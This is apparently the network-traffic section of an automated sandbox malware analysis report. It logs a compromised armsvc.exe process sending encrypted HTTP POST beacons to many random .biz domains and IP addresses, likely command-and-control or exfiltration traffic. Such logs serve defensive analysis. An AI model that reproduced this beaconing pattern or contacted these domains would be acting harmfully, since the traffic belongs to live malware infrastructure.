                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.030762911 CET358OUTPOST /fmxntfwxlcjyow HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.030762911 CET850OUTData Raw: 0d 60 c9 d7 82 f0 87 94 46 03 00 00 9d 3c 7f 43 b8 a8 07 e3 91 b5 12 e8 2c 5e fd d7 c6 39 e1 81 73 a2 d3 ec d5 48 70 a6 af 95 ed 41 40 f4 71 fa d9 c7 66 c4 95 0f 99 27 25 ef a7 6e 94 56 b5 cc 16 8a 06 2f cb 8a 93 79 e8 d6 6f ff c2 68 28 b6 2a 7d
                                                                                                                                                                                                                                                                        Data Ascii: `F<C,^9sHpA@qf'%nV/yoh(*}E-YEtH^v0_zLAoG_#E&Vn[/J7"PRXpru'Hiyw$~dSq(K#*[eo3y*T*D
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.145962954 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.356626987 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.701519966 CET350OUTPOST /vattrqg HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.701549053 CET850OUTData Raw: 36 a9 e1 f1 45 b0 6a bd 46 03 00 00 8c a2 7c 99 94 76 67 f1 d4 22 3f b4 30 4d 41 d8 38 59 7b 4e 50 86 7e 9d 02 05 0a 6e 27 14 6b 93 b4 71 b1 c5 37 84 7f 5d 98 8e 60 44 29 f9 ef 39 87 65 35 d1 ae cc 88 63 0f 9e d4 20 24 00 a5 b6 b8 f3 af cb 88 04
                                                                                                                                                                                                                                                                        Data Ascii: 6EjF|vg"?0MA8Y{NP~n'kq7]`D)9e5c $')fA|LBkB_)=8 9PH_46ba3^AKx`V4S8&by>LU?RyNl6&P4G`Ca:uC9%bM%1D0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.815042019 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.865535975 CET347OUTPOST /egbl HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.865595102 CET850OUTData Raw: 33 78 dc 86 b7 8a 10 ee 46 03 00 00 54 29 84 15 9f 03 86 fe f1 93 0b b9 2c 40 27 dc 10 32 1c 34 7b 1e f3 af 4c 8e 19 f1 d5 9f 02 46 bf e8 c7 b5 4e 8d 6d ef cd ec 23 b6 25 63 bd 7a 07 3e c6 e6 4e 72 b6 de c6 a4 c7 c2 4f 07 2f 97 8f f0 5c 76 47 3d
                                                                                                                                                                                                                                                                        Data Ascii: 3xFT),@'24{LFNm#%cz>NrO/\vG=Ht)63hY/kI0,XQ7.#7?oh8^Q}ihA3/PuhSt3;h{2.@dE$/,rso@ES9pRu+~hRh&vJ
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.040879965 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        41192.168.2.224920913.251.16.150803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.175888062 CET349OUTPOST /ekhmfom HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.175928116 CET850OUTData Raw: d6 69 41 76 4b 5e a6 b9 46 03 00 00 51 64 15 dc eb a8 3f 43 e5 09 28 65 05 12 f1 b5 a7 96 ce 1c 45 d1 a7 70 70 8a d1 0d f4 57 02 d5 5c 06 09 bd 5c 7d 23 e7 5b 14 54 20 b3 f0 b8 d0 bb 8c 3c 6f c6 0b 08 34 9e a7 b4 45 36 09 af e0 46 63 a2 b4 60 5f
                                                                                                                                                                                                                                                                        Data Ascii: iAvK^FQd?C(eEppW\\}#[T <o4E6Fc`_;ZM;IvF$BY5dA<Q7-TZtLnYf?X`85K_.}>jI+Xv\UqQi|Xnx1WJNk
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.542937040 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:56 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=68892579e3514c72578ad62da9fb7571|8.46.123.189|1736942336|1736942336|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        42192.168.2.224921082.112.184.19780
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.975646019 CET353OUTPOST /qpqnetyp HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 784
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.975646019 CET784OUTData Raw: 87 9a 3a be 35 37 ae c6 04 03 00 00 7c c0 70 d6 7f a4 37 9d f9 ab 14 7e cc 85 1f 6a f6 0c ba 30 a3 8d 66 2d 34 cf 11 52 df d8 69 a4 99 99 15 f3 13 c8 fb 00 f0 fa 0a fd 97 2e 12 e8 24 c6 2f 68 bb 15 df 4f 24 23 e5 a0 ed 2d a4 e5 c6 50 36 21 16 10
                                                                                                                                                                                                                                                                        Data Ascii: :57|p7~j0f-4Ri.$/hO$#-P6!)?Ken>9cJ0 ^n<Yv'nQEmJ]RoE7jR/PJ&WG~^c$hXh--c%N">od33J'#e


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        43192.168.2.224921144.221.84.105803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.838746071 CET361OUTPOST /tgbpchottuabpqdq HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.838781118 CET850OUTData Raw: ef 31 8c 07 1d b9 00 c9 46 03 00 00 89 8d 51 01 ac b4 72 73 76 48 ff 00 43 4d f6 14 82 81 ac 10 4f cb e5 2d 8f 08 ef 7f 60 95 da e9 5b b5 b7 f7 cd 44 db e7 05 f7 5d bc cc fd be 7c f7 37 18 23 fc 21 00 a4 c0 0e 68 8f f9 2b 0c 84 bd c8 db c7 f1 09
                                                                                                                                                                                                                                                                        Data Ascii: 1FQrsvHCMO-`[D]|7#!h+n7N!C>2Lg'/WFZu`E>Pf3*tjA\D`g'`r2,RSQmN%pSZagaK[e$Z_'N"A`"u9g/ThZU
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.376599073 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=b280894b37c829555135b2f23b25af96|8.46.123.189|1736942337|1736942337|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        44192.168.2.224921254.244.188.177803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.598474026 CET359OUTPOST /bcafsfattyjokwi HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.598474026 CET850OUTData Raw: ae 77 ef fb ac 8f b8 b3 46 03 00 00 8c e8 3e a7 99 c0 e0 cf 14 39 57 e4 ba 74 4c fa 24 b5 d2 70 41 9c 78 69 39 87 12 42 53 77 5c ae cd 74 2c 97 95 d0 52 29 ef 0c 6f 61 82 23 4c 36 c8 52 77 69 af 72 1b b6 ce 87 c2 a8 01 1f 72 84 06 21 04 ab 5d 9c
                                                                                                                                                                                                                                                                        Data Ascii: wF>9WtL$pAxi9BSw\t,R)oa#L6Rwirr!]<UM^a!k[:?p0PDUt\e /N'.x"h(wak:U:H;.1_6yg u99wi
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.308698893 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=feff8ff68bd52a708a6ab6fadbfa3d13|8.46.123.189|1736942338|1736942338|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        45192.168.2.224921335.164.78.200803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.330640078 CET351OUTPOST /uihfupcxt HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.330674887 CET850OUTData Raw: 08 2d 15 04 33 e4 8b 16 46 03 00 00 1c 2e b9 9e 82 ca da cd 34 59 11 cf ea 19 11 d2 80 13 a6 30 90 f0 bc 26 32 20 66 7c 71 ab 3b ff 71 5b c1 4e d1 0f f7 73 01 9d cb d3 ea 64 fe 4f 77 7e 41 c9 e1 03 03 40 de 35 6b 22 f4 ae ec 31 a6 70 b9 f4 8a d4
                                                                                                                                                                                                                                                                        Data Ascii: -3F.4Y0&2 f|q;q[NsdOw~A@5k"1poXI9^aTpwEnU_z?M_}Tute!oK@;=}B`Q-I>ui+u3KZ`AWJ^PIr8hw*l8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.220516920 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: btst=3d22ead3f581be6b4a2348d1875dc56b|8.46.123.189|1736942338|1736942338|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        46192.168.2.22492143.94.10.34803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.258728027 CET353OUTPOST /qgbipxbu HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
